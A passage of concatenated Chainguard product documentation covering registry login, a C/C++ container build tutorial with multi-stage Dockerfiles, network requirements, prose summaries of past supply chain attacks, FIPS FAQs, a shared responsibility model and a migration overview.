CHAINGUARD_PYTHON_IDENTITY_ID and password CHAINGUARD_PYTHON_TOKEN value for the pull token for the desired language ecosystem: machine libraries.cgr.dev login CHAINGUARD_PYTHON_IDENTITY_ID password CHAINGUARD_PYTHON_TOKEN Note that the long string for the password value must use only one line. Verify entitlement You can verify entitlements for your organization example with the following command: chainctl libraries entitlements list --parent=example The output must include the desired ecosystem in the table: Ecosystem Library Entitlements for example (45a0...764595) ID | ECOSYSTEM ------------------------------------------------------------+------------ 45a....................................................e1 | JAVA 45a....................................................x6 | PYTHON Contact your Chainguard account owner for confirmation or adjustments if necessary. --- ### Getting Started with the C/C++ Chainguard Containers URL: https://edu.chainguard.dev/chainguard/chainguard-images/getting-started/c/ Last Modified: March 21, 2025 Tags: Chainguard Containers, Product C and its derivative, C++, are two widely adopted compiled languages. Chainguard offers a variety of minimal, low-CVE container images built on the Wolfi un-distro which are suitable for deploying C-based compiled programs. In this guide, you will explore three ways you can use Chainguard Containers to compile and run a C-based binary. The container image with which you choose to run your compiled program depends on the nature of your binaries. Static binaries can be executed in the minimal static Chainguard Container, while dynamically linked binaries can be run in the glibc-dynamic Container. 
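If you’re not sure which kind of binary you’re working with, you can check before picking a runtime image. A quick sketch using the standard file and ldd utilities, assuming a compiled binary named hello like the one built later in this guide:
file hello
ldd hello
The file command reports whether the executable is statically or dynamically linked, and ldd lists the shared libraries a dynamically linked binary requires (for a static binary it prints “not a dynamic executable”).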
For this demonstration, you will first compile a C binary using the gcc-glibc Chainguard Container, and then learn how to use a multi-stage build to run the resulting binary in the glibc-dynamic image. You’ll also cover an example showing the multi-stage build process for the C++ programming language. To learn more about the differences between these container images, read our article on Choosing a Container for your Compiled Programs. What is distroless? Distroless container images are minimalist container images containing only essential software required to build or execute an application. That means no package manager, no shell, and no bloat from software that only makes sense on bare metal servers. What is Wolfi? Wolfi is a community Linux undistro created specifically for containers. This brings distroless to a new level, including additional features targeted at securing the software supply chain of your application environment: comprehensive SBOMs, signatures, daily updates, and timely CVE fixes. Chainguard Containers Chainguard Containers are a mix of distroless and development container images based on Wolfi. Daily builds make sure images are up-to-date with the latest package versions and patches from upstream Wolfi. Video The content in this article is also available as a video. Prerequisites To follow along with this guide, you will need to have Docker Engine and gcc, the GNU Compiler Collection, installed on your machine. You can find the code and Dockerfiles used in our Containers demos GitHub repository. Example 1 — Minimal C Chainguard Container Step 1: Setting up a Demo Application To start, let’s create a demo C application to run in your container. First you will create a folder to contain your demo files. The following command will create a new directory cguide and navigate to it.
mkdir -p ~/cguide && cd ~/cguide
Within this directory, you will create a file to hold the code for your first program. Use the text editor of your choice to begin editing a new file named hello.c. We will use nano as an example:
nano hello.c
Inside of your hello.c file, add in the following C code which will execute a “Hello, world!” application.
/* Chainguard Academy (edu.chainguard.dev)
 * Getting Started with the C/C++ Chainguard Containers
 * Examples 1 & 2 - C
 */
#include <stdio.h>

// Main Function
int main(){
    printf("Hello, world!\n");
    printf("I am a demo from the Chainguard Academy.\n");
    printf("My code was written in C.\n");
    return 0;
}
When you are done editing the file, save and close it. If you used nano, you can do so by pressing CTRL + X, Y, and then ENTER. Now, let’s compile this file with gcc. This command uses the -Wall flag to display compiler errors and warnings, if any occur, and includes the -o flag to name your executable hello.
gcc -Wall -o hello hello.c
Once your program has compiled, you can run it with the following command:
./hello
This will return the “Hello, world!” program output in your terminal if the program executed successfully.
Hello, world!
I am a demo from the Chainguard Academy.
My code was written in C.
Now that you have successfully tested your example program locally, next, you will compile and run it from inside of a container image. Step 2: Creating the Dockerfile An advantage of choosing to run your code inside of containerized environments is portability. In the previous step, gcc compiled the binary to run on your machine. However, if you were to run this binary on a different operating system, it will likely fail to execute properly.
Using a container ensures that your program will run on any machine as the containerized environment will be consistent across platforms. Let us begin by creating a Dockerfile called Dockerfile1 for your container image.
nano Dockerfile1
This Dockerfile will do the following: Use the gcc-glibc:latest Chainguard Container as the base image; Create and set the current working directory to /home/build; Copy the hello.c program code to the current directory; Compile the program and name it hello; Copy the compiled binary to /usr/bin; Set the image to run as a non-root user; and, Execute the compiled binary when the container is started.
# Example 1 - Single Stage Build for C
FROM cgr.dev/chainguard/gcc-glibc:latest
RUN ["mkdir", "/home/build"]
WORKDIR /home/build
COPY hello.c ./
RUN ["gcc", "-Wall", "-o", "hello", "hello.c"]
RUN ["cp", "hello", "/usr/bin/hello"]
USER 65532
ENTRYPOINT ["/usr/bin/hello"]
Add this text to your Dockerfile, save, and close it. Next, use the Dockerfile you just created to build a container image named example1 by running the following command. The -f flag specifies the Dockerfile which you are using to build from, and the -t flag will tag your image with a meaningful name.
docker build -f Dockerfile1 -t example1:latest .
With your container image built, you can now run it with the following command.
docker run --name example1 example1:latest
You will see output in your terminal identical to that of the binary you compiled locally.
Hello, world!
I am a demo from the Chainguard Academy.
My code was written in C.
In the next example, we will look at an alternative way to run your binary using a multi-stage build. Example 2 — Multi-Stage Build for C Applications In our first example, you successfully compiled and executed your C binary in the gcc-glibc image. To go a step further, you can use a multi-stage build, allowing you to compile your program in one image and execute it in another image. A multi-stage build gives you more control over your final image, as you can transfer your program to an image with a smaller footprint after build time to reduce your program’s attack surface. The glibc-dynamic image, which you will use as your second stage in the build, does not contain gcc. Because of this, a malicious binary could not be compiled by an attacker tampering with the image. Creating the Dockerfile Create a new Dockerfile called Dockerfile2.
nano Dockerfile2
This time, the Dockerfile will do the following: Use the gcc-glibc Chainguard Container as the builder stage; Create and set the current working directory to /home/build; Copy your example hello.c program code to the current directory; Compile the program using gcc and name it hello; Begin a new stage using the glibc-dynamic Chainguard Container; Copy the compiled binary to /usr/bin from the builder stage; Set the image to run as a non-root user; and, Execute your binary from the glibc-dynamic image when the container is started.
# Example 2 - Multi-Stage Build for C
FROM cgr.dev/chainguard/gcc-glibc:latest AS builder
RUN ["mkdir", "/home/build"]
WORKDIR /home/build
COPY hello.c ./
RUN ["gcc", "-Wall", "-o", "hello", "hello.c"]

FROM cgr.dev/chainguard/glibc-dynamic:latest
COPY --from=builder /home/build/hello /usr/bin/
USER 65532
ENTRYPOINT ["/usr/bin/hello"]
When you are finished editing your Dockerfile, save and close it. With the new Dockerfile created, you can build the image. Execute the following command in your terminal to build your multi-stage image.
docker build -f Dockerfile2 -t example2:latest .
With your image built, you can now run it with the following command.
docker run --name example2 example2:latest
You will see output in your terminal identical to that of the previous example.
Hello, world!
I am a demo from the Chainguard Academy.
My code was written in C.
Having your program execute from a smaller container image with fewer packages reduces your potential attack surface, making it a more secure approach for production-facing builds. Example 3 — Multi-Stage Build for C++ Applications So far, our demonstrations have featured a program coded in C. A similar image building process applies to binaries compiled from the C++ programming language. Step 1: Setting up a Demo Application In your terminal, create a new file called hello.cpp.
nano hello.cpp
Add the following C++ code to the file you just created. This code will display a greeting specifying that it was written in C++.
/* Chainguard Academy (edu.chainguard.dev)
 * Getting Started with the C/C++ Chainguard Containers
 * Example 3 - C++
 */
#include <iostream>

using namespace std;

// Main Function
int main(){
    cout << "Hello, world!\n";
    cout << "I am a demo from the Chainguard Academy.\n";
    cout << "My code was written in C++.\n";
    return 0;
}
When you are done editing your file, save and close it. You can now compile your C++ program using g++. Execute the following command in your terminal to compile the program. The command will display any compiler warnings or errors and will name the resultant binary hello.
g++ -Wall -o hello hello.cpp
Now you can test your compiled binary.
./hello
You will see the following output in your terminal.
Hello, world!
I am a demo from the Chainguard Academy.
My code was written in C++.
Now that you have confirmed that your C++ program executes, you are ready to build it inside of a container image. Step 2: Creating the Dockerfile With a working C++ example, you can compile and run your program using a multi-stage build. With the text editor of your choice, create a new file named Dockerfile3.
nano Dockerfile3
This Dockerfile will do the following: Use the gcc-glibc Chainguard Container as the builder stage; Create and set the current working directory to /home/build; Copy your example hello.cpp program code to the current directory; Compile the program using g++ and name it hello; Begin a new stage using the glibc-dynamic Chainguard Container; Copy the compiled binary to /usr/bin from the builder stage; Set the image to run as a non-root user; and, Execute your binary from the glibc-dynamic image when the container is started.
# Example 3 - Multi-Stage Build for C++
FROM cgr.dev/chainguard/gcc-glibc:latest AS builder
RUN ["mkdir", "/home/build"]
WORKDIR /home/build
COPY hello.cpp ./
RUN ["g++", "-Wall", "-o", "hello", "hello.cpp"]

FROM cgr.dev/chainguard/glibc-dynamic:latest
COPY --from=builder /home/build/hello /usr/bin/
USER 65532
ENTRYPOINT ["/usr/bin/hello"]
When you are finished editing your Dockerfile, save and close it. With your new Dockerfile created, you can build the container image. Execute the following command in your terminal to build your multi-stage C++ image.
docker build -f Dockerfile3 -t example3:latest .
With your image built, you can now run it with the following command.
docker run --name example3 example3:latest
You will see output in your terminal identical to that of the C++ binary you compiled locally.
Hello, world!
I am a demo from the Chainguard Academy.
My code was written in C++.
With that, you have successfully performed a multi-stage image build for both C and C++ programs.
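As a further variation, a fully static binary can run in the minimal static Chainguard Container mentioned at the beginning of this guide. The following Dockerfile is a minimal sketch rather than part of the guide’s official examples; it assumes the static image is available to you and that fully static linking is appropriate for your program:
# Hypothetical variation - Multi-Stage Build for a statically linked C binary
FROM cgr.dev/chainguard/gcc-glibc:latest AS builder
RUN ["mkdir", "/home/build"]
WORKDIR /home/build
COPY hello.c ./
# -static asks gcc to link libc statically so the binary has no runtime library dependencies
RUN ["gcc", "-Wall", "-static", "-o", "hello", "hello.c"]

FROM cgr.dev/chainguard/static:latest
COPY --from=builder /home/build/hello /usr/bin/
USER 65532
ENTRYPOINT ["/usr/bin/hello"]
The build and run commands are the same as in the earlier examples, with only the Dockerfile name and image tag changed.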
Clean Up After completing the previous examples, you will have containers, images, and files remaining on your local machine. This section will show you how to remove these artifacts. You can remove the containers you built by executing the following command.
docker container rm example1 example2 example3
Then, you can remove their associated container image builds as well:
docker image rm example1:latest example2:latest example3:latest
To remove the directory containing your Dockerfiles, binaries, and program code, run the following command:
rm -r ~/cguide
Following these commands, all artifacts introduced in this guide will now be removed from your machine. Advanced Usage If your project requires a more specific set of packages that aren't included within the general-purpose C/C++ Chainguard Container, you'll first need to check if the package you want is already available on the wolfi-os repository. Note: If you're building on top of a container image other than the wolfi-base container image, the image will run as a non-root user. Because of this, if you need to install packages with apk add, you need to use the USER root directive. If the package is available, you can use the wolfi-base image in a Dockerfile and install what you need with apk, then use the resulting image as the base for your app. Check the "Using the wolfi-base Container" section of our images quickstart guide for more information. If the packages you need are not available, you can build your own apks using melange. Please refer to this guide for more information. --- ### Chainguard Libraries Network Requirements URL: https://edu.chainguard.dev/chainguard/libraries/network-requirements/ Last Modified: June 4, 2025 Tags: Chainguard Libraries, Reference The following sections detail the required network access to use Chainguard Libraries and the related tools such as chainctl. Access for chainctl and Other Tools For initial configuration with chainctl as well as for verification of downloaded libraries with cosign and other tools, you must have HTTPS access to the following domains: dl.enforce.dev for download and update of chainctl issuer.enforce.dev for authentication in the web console and with chainctl console-api.enforce.dev for the web console and chainctl to administrate and use your Chainguard accounts. console.chainguard.dev for the web console to administrate and use your Chainguard accounts. Access for Libraries Chainguard Libraries use is transparent for development efforts and typically requires no additional network access for workstations and other infrastructure running builds, because the libraries are provided by the repository manager as configured for Java or Python. The repository manager application must have HTTPS access to the domain libraries.cgr.dev for library access and issuer.enforce.dev for authentication. If you are accessing Chainguard Libraries directly for testing with curl or with a build tool, the workstation used must have identical access.
You can therefore avoid issues from the following software supply chain attack surface points: Build pipeline Build system Dependency injection Bypass of CI/CD systems Library distribution Library consumption More information about these stages in the software supply chain is available on the Supply chain Levels for Software Artifacts (SLSA) website. The following examples are issues, attacks, and compromises that affect stages of the software supply chain for libraries across different language ecosystems: Malicious GlueStack Packages This May 2025 attack uploaded compromised packages to PyPI and npm that enable remote shell access and uploading files to compromised machines Chainguard Libraries would have protected against this attack. First, the packages have invalid upstream source URLs so there was no source repository. In the case of the lone exception (a package with a valid source repository link), no code was present for Chainguard to build a valid package. The Hacker News blog post on the attack Ultralytics Python project Attackers compromised the GitHub Actions workflows for the Ultralytics repository, injecting malware into PyPI package releases. Attackers pushed out four malicious versions of the Ultralytics YOLO project over the course of a week (8.3.41, 8.3.42, 8.3.45, 8.3.46). Ultralytics YOLO is a widely-used fast object detection neural network library downloaded about five million times per month. Users affected during this period were infected with cryptomining malware. Chainguard Libraries would have prevented this attack by building the project from clean source. No source code was modified by attackers during this incident. See also PyPI attack analysis and bleepingcomputer blog post. Lottie Player Hackers gained access to the NPM registry by compromising a developer authentication token. Token used to upload a compromised version of Lottie Player. The malicious package drained crypto wallet funds. Chainguard Libraries would have prevented this attack by building the project from clean source. No source code was modified by attackers during this incident. See also npm package Lottie-Player compromised in supply chain attack, Nov 2024. MavenGate MavenGate is a proof of concept for exploiting abandoned Java library domains. Vulnerabilities in Maven dependency management allow unauthorized package replacements. All Java build tools using Maven repositories, including Maven, Gradle, and Ant, could be affected. MavenGate relied on the use of multiple repositories and any attack with the proposed mechanism would not publish source code. Chainguard Libraries use replaces other repositories and the use of Chainguard Libraries, based on building from the original source, would have prevented an attack using this approach See also The Hacker News article, Oversecured blog post, and Sonatype’s take as Maven Central operator. XZ Utils backdoor Example of a supply chain attack leveraging social engineering by a patient actor Sophisticated backdoor that had remote code execution capability and the potential to affect many systems Vulnerability was patched within hours of disclosure by reverting to a previous version known to be safe. Malicious source tarball and binaries were distributed successfully, but source code repository was not compromised. Since no source code was compromised, a similar attack on a protected library ecosystem would be prevented by Chainguard Libraries XZ Utils is written in C and therefore not available as an ecosystem protected by Chainguard Libraries. 
However, Chainguard Containers include XZ Utils packages. These are also built from source and are not affected. See also Wikipedia article and official page from the XZ data compression. Other examples and resources The following links provide details for other software supply chain attacks. Depending on the exact details some of these attacks and approaches are prevented by use of Chainguard Libraries. Successful supply chain attack on Solana JS library PyPI packages without source Compromised PyTorch nightly Commercial artifacts with RCE vulnerability and without source on PyPI, Aug 2024 Thwarted attempts to flood npm registry PyPI Python library “aiocpa” found exfiltrating crypto keys via Telegram bot, Nov 2024 Supply chain attack detected in Solana’s web3.js library. Dec 2024 PyTorch namespace (dependency) confusion attack Typo squatting attempt to gain credentials Typo squatting attempts on Maven Central tj-actions GitHub action issue as example of build infrastructure supply chain compromise Find pointers to further resources in the Software supply chain reading list. Does Chainguard Libraries for Java include CVE remediation fixes? Short answer: No. Libraries are built from source code in the secured and hardened Chainguard infrastructure. This eliminates any build and distribution stage vulnerabilities. More details: Chainguard cannot patch Java libraries and create binaries with the same identifier because the complete behavior and API surface of every library affects the use. That use however is part of the application development of each customer. It varies widely and any change potentially creates incompatibilities, different behavior or even new security issues. Chainguard collaborates with many upstream projects and can collaborate with customers to increase and accelerate the creation and adoption of fixes and the work towards new releases. Importantly, over 95% of all known vulnerable components have a fixed version available and, by adopting those newer versions in your application, you can remediate most CVEs. Chainguard Libraries for Java includes those newest versions and adds the build and distribution channel security. What are Chibbies? Chibbies is the internal codename for the Chainguard Libraries. It evolved from Chainguard Libraries being shortened to Chainguard Libbies, and then finally to Chibbies. --- ### Chainguard Criteria for Determining Whether to Build a Container Image URL: https://edu.chainguard.dev/chainguard/chainguard-images/about/what-chainguard-will-build/ Last Modified: March 21, 2025 Tags: Chainguard Containers, Product There are currently over 1,000 Chainguard Containers and that number is always growing as we add more to our expanding catalog. If you would like to purchase a Chainguard Container that is not yet available, or inquire about whether we would build a given container image for purchase, Chainguard will endeavor to perform an analysis on the request. Chainguard aims to build new container images that are relevant to our customers and to support broader software security goals. However, it is not always feasible to package and build software. Please note that we have the following general criteria when considering requests. The source code is freely available in a Source Code Manager (SCM) system such as GitHub or GitLab. The project is licensed under a FOSS license. Non-FOSS licenses are reviewed on a case-by-case basis. The project is actively maintained with supported versions. That is: There are recent commits and releases. 
The project has not reached its end of life (EOL). The project has maintained active versions. The project does not rely on outdated or unmaintained dependencies; for example, unsupported versions of Python, OpenSSL, etc. There is usually a lead or owner. There are no technical blockers preventing us from building the container image as we’ve determined as part of an initial analysis process. If the software project or container image you have in mind to purchase meets the above criteria, please contact us for more information. --- ### Chainguard FIPS Container FAQs URL: https://edu.chainguard.dev/chainguard/chainguard-images/features/fips/faqs/ Last Modified: April 8, 2025 Tags: Chainguard Containers, Product, FIPS Answers to your questions about Chainguard FIPS container images. Is there a way to enable or disable the FIPS mode in a FIPS image? All Chainguard FIPS Containers are configured in approved-only mode as noted in our FIPS commitment. For non-approved mode, our recommendation is to purchase and use a non-FIPS Chainguard Container. Because it is error prone, difficult to support, and fragile, Chainguard does not provide the ability to switch to non-FIPS mode from a FIPS container image. If you require that, please contact a NIST-approved security lab to help you achieve your certification needs when using our FIPS modules. Does a given Chainguard FIPS Container require me to “bring my own license”? From the Containers Directory or Containers Console, search for the container image you would like to know more about, and check if it has the “Bring Your Own License” badge. If it does, you can, or in some cases must (depending on the container image), bring your own license keys for the product. Review the Overview documentation for the given image, and review the application’s documentation for further guidance. Which Chainguard Containers tags have kernel-independent FIPS? For Chainguard Containers built from November 7, 2024 onward, the minimum requirements for kernel-independent FIPS are based on the package listings in their relevant SBOMs. The SBOMs must contain: libcrypto3>=3.4.0-r2 openssl-config-fipshardened>=3.4.0-r3 This enables the use of a user-space entropy source with the ESV (Entropy Source Validation) certificate as listed on our [FIPS commitment](https://www.chainguard.dev/legal/fips-commitment) page. Note there is no change to the CMVP (Cryptographic Module Validation Program) certificate, as the entropy source is outside of the FIPS boundary. The ESV certificate satisfies the entropy requirements caveat of the CMVP certificate. The following packages are excluded: bouncycastle-fips bouncycastle-fips-1.0 Any with -cni- in the name You can read more about kernel-independent FIPS Containers in our blog announcement. How can I block SHA-1 in OpenSSL or FIPS? Right now, there are limitations on blocking specific algorithms. OpenSSL currently only offers a limited set of policies that can be applied to block generic algorithms. It has better runtime configuration options for TLS (with regard to CipherSuite selection and ECDH Curves), but nothing that can be more specific (like blocking RSA signatures with SHA2-224). Chainguard engineering is actively working with the relevant upstream groups to offer more solutions in the future. How long does it take to develop and submit a new module for FIPS certification? FIPS submission requirements continuously evolve.
No project is always compliant with all the latest requirements, and typically requires testing by a certification lab followed by patching and fixing. Once the testing and patching are done, a project moves onto getting entropy certifications. Once the certifications and relevant code changes are in order, the project can submit to FIPS. Once submitted, it must move through several states: pending review, coordination, finalization, and if everything is in order a certificate will be issued. The current average wait time from submission to certificate received is 590 days. Many popular applications use Mozilla NSS, and have no alternative (that is, they cannot switch to use OpenSSL or Bouncy Castle). Can these applications get Chainguard FIPS Containers? Given Mozilla NSS’s rapid release cycles that quickly reach EOL (end-of-life), coupled with the length of time necessary for FIPS certification, the likely scenarios where NSS could become FIPS certified would not be compatible with Chainguard’s product commitments. Because Chainguard provides up-to-date software with zero-to-limited CVEs, it is not currently feasible for us to offer FIPS container images of software that use NSS. NSS does not have a stable API/ABI as it is a collection of low-level libraries, which typically are tightly coupled with the application that uses them. This is in contrast to OpenSSL, which presents one application facing API-ABI, and has an internal provider (plugin) architecture allowing the use of a separately built FIPS provider. For example, OpenSSL v3.4 released in 2024 is using the FIPS provider v3.0 released in 2021 due to strong API-ABI stability commitments. Can Chainguard provide FIPS versions of Rust applications or toolchains to build FIPS compliant Rust applications? Not yet, but we are working with upstream groups to fix this. Many compilers and interpreters provide cryptography and TLS functionality as part of their standard libraries. Most of them already use OpenSSL on Linux (such as Python, Node, .NET, and Ruby) or can be made to use OpenSSL (such as Go). The Rust standard library does not implement or provide any cryptography or TLS. This creates a challenge to FIPS compliance, as there is no default cryptographic implementation. The cryptography of an individual application written in Rust depends on which crates it leverages. The vast majority of crates that are listed under the “crypto” or “cryptography keywords have not been certified and do not have plans to complete certifications. This includes the most popular crates such as rustcrypto and ring. The most popular crate for TLS is rustls (many higher-level crates ultimately depend on rustls), which supports multiple alternative providers. As examples, rustls can use aws-lc-rs, ring, OpenSSL, and BoringCrypto implementations of the underlying (and in some cases FIPS certifiable) cryptography. However, if you run a default build of the rustls crate alone with the FIPS feature turned on today, it will pull in both FIPS and non-FIPS implementations. This is due to the dependency resolution of crates and the additive nature of features. If an application itself, and some of its dependencies, require rustls, each one of them will bring in a non-FIPS version of rustls into the binary despite a FIPS provider already present and linked into the binary. 
Even the most minimal applications like rustls-ffi (rustls compiled as a shared library with nothing else) and ztunnel (which uses just a single TLS mode and nothing else) link in non-FIPS cryptographic implementations in addition to the FIPS ones. In practice, this doubles the amount of dependencies in the binary, increases its size, and portions of the application end up using non-FIPS cryptography when it shouldn’t. We detected this at Chainguard because we compile all rust binaries with cargo-auditable and thus can observe which crates a given binary is linked with through rust-audit-info. Chainguard is currently exploring upstream methods for ensuring FIPS compliance given these challenges. Until then, it is not practical to build any Rust applications in FIPS mode that use TLS. Are Go binaries compiled with the upstream Golang provided GOEXPERIMENT=boringcrypto covered by the Chainguard FIPS commitment? The short answer is no. Google and Golang upstream do not provide any support for GOEXPERIMENT=boringcrypto compiled binaries. The security policy for those modules contains many unapproved algorithms. The Golang upstream toolchain does not indicate missbuilt binaries that do not use boringcrypto (at all or partially) at runtime, and correctly compiled binaries allow using unapproved algorithms without restriction. Using the Golang upstream GOEXPERIMENT=boringcrypto requires strict adherence to the security policy, manual code audits of all source code, and all go.sum vendored copies of code. Due to these caveats, we strongly recommend using the go-fips, go-msft-fips, and go-openssl Chainguard Containers. These Chainguard Containers: Use system OpenSSL as the cryptographic module in approved mode Are covered by the Chainguard FIPS Commitment Are in scope for Kernel-Independent FIPS Containers Can WireGuard with Tailscale or Shadowsocks be used for Chainguard FIPS Containers? No, the WireGuard protocol, and popular ways to use it with Tailscale and Shadowsocks cannot use approved cryptography, because the protocol requires unapproved algorithms. As it stands today, the WireGuard protocol is not customizable (like TLS), and it is not possible to replace any of the unapproved cryptographic primitives with approved equivalents as it will not be a WireGuard protocol anymore. For approved cryptography and similar functionality, please consider using OpenVPN or Strongswan, both of which can be configured to use approved cryptography only, with a FIPS cryptographic module. --- ### Chainguard Shared Responsibility Model URL: https://edu.chainguard.dev/chainguard/chainguard-images/about/shared-responsibility-model/ Last Modified: January 13, 2025 Tags: Conceptual, Chainguard Containers, Product Chainguard’s mission is to be the safe source for open source. As part of this mission, Chainguard builds all of our packages and images from upstream open source code and delivers the resulting artifacts to our customers. There are three distinct parties involved here: Upstream projects, Chainguard, and Customers; each of these parties share some measure of responsibility across a few dimensions. This guide is an overview of Chainguard’s Shared Responsibility Model: a framework that outlines the security responsibilities of upstream open source software projects, Chainguard, and its customers. 
The dimensions of shared responsibility this guide covers are: Releases: defining and tracking what is and is not supported Patching: defining which parties are responsible for patching each element of what goes into a container image Testing: defining which parties are responsible for testing what scope of functionality Releases Upstream projects are responsible for cutting releases and documenting its supported release policy, including any rules it adheres to around quality or breaking changes, and (in the case of more mature projects) a release cadence or schedule. Chainguard is responsible for building all of the upstream-supported versions of a piece of software. Customers are responsible for staying on one of the upstream-supported versions of a piece of software. A common pitfall we see, which drives an enormous incidence of CVEs across our prospects, is the use of “end-of-life” (or “EOL”) software. The following diagram, taken from the Risk section of Sonatype’s 2024 State of the Software Supply Chain report, highlights how more EOL components per application tends to lead to more security vulnerabilities: It is a customer’s responsibility to stay on a supported version of the software, and the responsibility of Chainguard to ensure that the customer receives builds of that version of the software to consume in their private registry on cgr.dev. Patching Upstream projects are responsible for staying on supported releases of their own dependencies, such as with an automatic dependency update tool like dependabot or Renovate. Upstream projects are also, at a minimum, responsible for staying on an API-compatible version of libraries they depend on transitively. Chainguard is responsible for assembling container images from fully patched upstream software. You can find more details on this in our SLA for CVEs. Chainguard will also attempt to rebuild upstream software with the latest toolchain and their dependencies updated where that can be done without breaking changes (see the following Testing section). Customers are responsible for building on or with fully patched Chainguard Container Images, and for patching any components they add to the Chainguard Container Image. There are generally two form-factors of Chainguard Container Images: Application and Base images, so let’s go over the patching responsibilities through these respective lenses. Application Container Images These are Chainguard Container Images that users generally just take and run (for example, by plugging into Helm). We created the following diagram to help customers understand where the division of responsibility is generally drawn for this class of images: Upstream projects are responsible for staying on API-compatible versions of libraries. Chainguard is responsible for rebuilding the upstream project with the latest toolchain, and patching static and dynamic dependencies where such a change is non-breaking. Customers are responsible for tracking a supported version of the Chainguard image. Please refer to our Product Release Lifecycle documentation for more information on what versions are supported. Base Container Images These are Chainguard Container Images that users extend with their own packages and applications (such as with a Dockerfile). We created the following diagram to clarify where the division of responsibility is drawn for these images: Upstream projects are responsible for patching supported releases in a timely manner. 
Chainguard is responsible for releasing fully patched toolchain and base images. Customers are responsible for patching any applications and dependencies they add to a Chainguard image. We recommend using a fully patched Chainguard toolchain image to build the application, and using a fully patched Chainguard base image to layer the final application on. Testing Upstream projects are responsible for defining conformance criteria and establishing conformance benchmarks (such as Java TCK, Kubernetes Conformance, Knative Conformance) that clearly outline the criteria for a downstream distribution to represent itself as a “conformant” distribution of the software. Chainguard is responsible for producing conformant distributions of upstream applications; where the upstream project does not define conformance criteria Chainguard is responsible for using its discretion in validating the functionality of the application and (within reason) accepting scenarios from Customers to run as part of the Chainguard qualification process. Refer to our conceptual article on How Chainguard Container Images are Tested for more information. Customers are responsible for ensuring that Chainguard-provided images cover all of their desired functionality, and partnering with Chainguard to ensure the requisite coverage is part of our qualification process if gaps are identified. Customers are responsible for testing all of their modifications to Chainguard Container Images and for responsibly rolling out Chainguard Container Images to ensure there are no regressions specific to their environment or usage. Given the highly subjective nature of performance testing to environment and configuration, Customers are responsible for ensuring that Chainguard Container Images satisfy performance requirements as part of the responsible rollout process. Chainguard is committed to making our customers successful, and will partner with Customers (within reason) to investigate performance anomalies, but the Customer is responsible for ensuring Chainguard can reproduce the issue. Please refer to our support policy for more information on how Chainguard will partner with customers. By their minimal nature, some Chainguard Container Images may not include certain functionalities by default, so it is important that Customers ensure that Chainguard Container Images drop-in to their environments safely. Again, Chainguard is committed to making our customers successful, and will partner with Customers to ensure that images support the core scenarios in which an image is used. Following the principle of immutability, Chainguard recommends that customers pin Chainguard Container Images and make use of tooling such as dependabot, Renovate, or our own digestabot to qualify image updates through the customers’ CI/CD processes covering in-scope usage scenarios. This is key to responsibly rolling out changes because the reality is that upstream, Chainguard, and customers are all fallible and regressions can happen; but this pattern enables folks to have a clear rollback story. Learn More We encourage you to check out our other resources on recommended practices to ensure that your Chainguard Container Images are effectively maximizing your organization’s security posture. As example, you can read through our conceptual articles on Strategies for Minimizing your CVE Risk or Considerations for Keeping Container Images Up to Date. 
--- ### Overview of Migrating to Chainguard Containers URL: https://edu.chainguard.dev/chainguard/migration/migrations-overview/ Last Modified: August 8, 2024 Tags: Chainguard Containers, Product Chainguard Containers are a collection of container images designed for security and minimalism. Many Chainguard Containers are distroless; they contain only an open-source application and its runtime dependencies. These container images do not even contain a shell or package manager, because fewer dependencies reduce the potential attack surface of images. By minimizing the number of dependencies and thus reducing their potential attack surface, Chainguard Containers inherently contain few to zero CVEs. Chainguard Containers are rebuilt nightly to ensure they are completely up-to-date and contain all available security patches. With this nightly build approach, our engineering team sometimes fixes vulnerabilities before they’re detected. The main features of Chainguard Containers include: Minimalist design, with no unnecessary software bloat Automated nightly builds to ensure Containers are completely up-to-date and contain all available security patches High quality build-time SBOMs (software bill of materials) attesting the provenance of all artifacts within the Container Verifiable signatures provided by Sigstore Reproducible builds with Cosign and apko (read more about reproducibility) Because of their minimalist design, Chainguard Containers sometimes require users to adjust their image workflows. This document is intended to serve as a migration guide for customers transitioning their organizations to use Chainguard Containers. It includes general tips and strategies for migrating to Chainguard Containers as well as a curated set of migration-related resources. Migration Key Points Most Chainguard Containers have no shell or package manager by default. This is great for security, but sometimes you need these things, especially in builder images. For those cases we have development container images (also known as -dev images, as in cgr.dev/chainguard/python:latest-dev) which do include a shell and package manager. The development variants and wolfi-base / chainguard-base use BusyBox by default, so any groupadd or useradd commands will need to be ported to addgroup and adduser. The free Starter tier of Containers provides only the :latest and :latest-dev versions. Our paid Production Containers offer tags for major and minor versions. Chainguard Containers are based on glibc and our packages cannot be mixed with Alpine packages (which are instead based on musl). In some cases, the entrypoint in Chainguard Containers can be different from equivalent images based on other distros, which can lead to unexpected behavior. You should always check the image’s specific documentation to understand how the entrypoint works. When needed, Chainguard recommends using a base image like chainguard-base or a development variant to install an application’s OS-level dependencies. Perhaps the best place for most users to get started with migrating to Chainguard Containers is by following our guide on How to Port a Sample Application to Chainguard Containers. This guide involves updating a sample application made up of three services to use Chainguard Containers. Although the application involved is fairly simple, the concepts outlined in the guide can also be useful for migrating more complex applications. 
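To illustrate the BusyBox point from the key points above, a Debian-style RUN instruction that creates a service account needs to be rewritten when moving to a -dev variant or to wolfi-base / chainguard-base. A minimal sketch, using a hypothetical app user and group:
# Debian or Ubuntu base image (shadow-utils)
RUN groupadd -r app && useradd -r -g app app
# Chainguard -dev variant or wolfi-base / chainguard-base (BusyBox)
RUN addgroup -S app && adduser -S -G app app
Alternatively, many Chainguard Containers already ship with a non-root user (UID 65532) that you may be able to reuse instead of creating your own.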
Development Containers As mentioned previously, Chainguard’s standard container images typically do not include a shell or package manager. This helps to minimize the size of containers and also reduces their potential attack surface, but many users find that they need images that include a shell or package manager to support their specific use case. For this reason, Chainguard offers development containers (also known as -dev variants, since their image tags are appended with -dev). These variants come with more tooling than our standard container images, including a shell and package manager. Although development variants are still more secure than most popular container images based on other distros, for increased security in production environments we recommend combining them with a distroless variant in a multi-stage build. Refer to our guide on Chainguard’s Container variants for more information on development containers. Before Migrating Before you begin actively migrating to Chainguard Containers, review the images that your organization has access to and determine which teams and applications will be using each image. Notify the teams involved in the migration process so they can begin preparing. For teams that are new to Chainguard Containers, we recommend taking the online self-paced course, Linky’s Guide to Chainguard Containers. Next, determine which users and/or systems are going to need access to your Chainguard registry in order to begin preparing access. Most customers will need to copy images from their Chainguard registry into their organization’s registry. An easy way to do this is by configuring the organization’s registry as a pull-through mirror of the Chainguard registry. We have a guide on how to configure Artifactory for this use case. Recommended Rollout Approach When the goal is to migrate multiple deployments to Chainguard Containers, a major consideration is the strategy by which these container images are rolled out and deployed throughout your environment. The 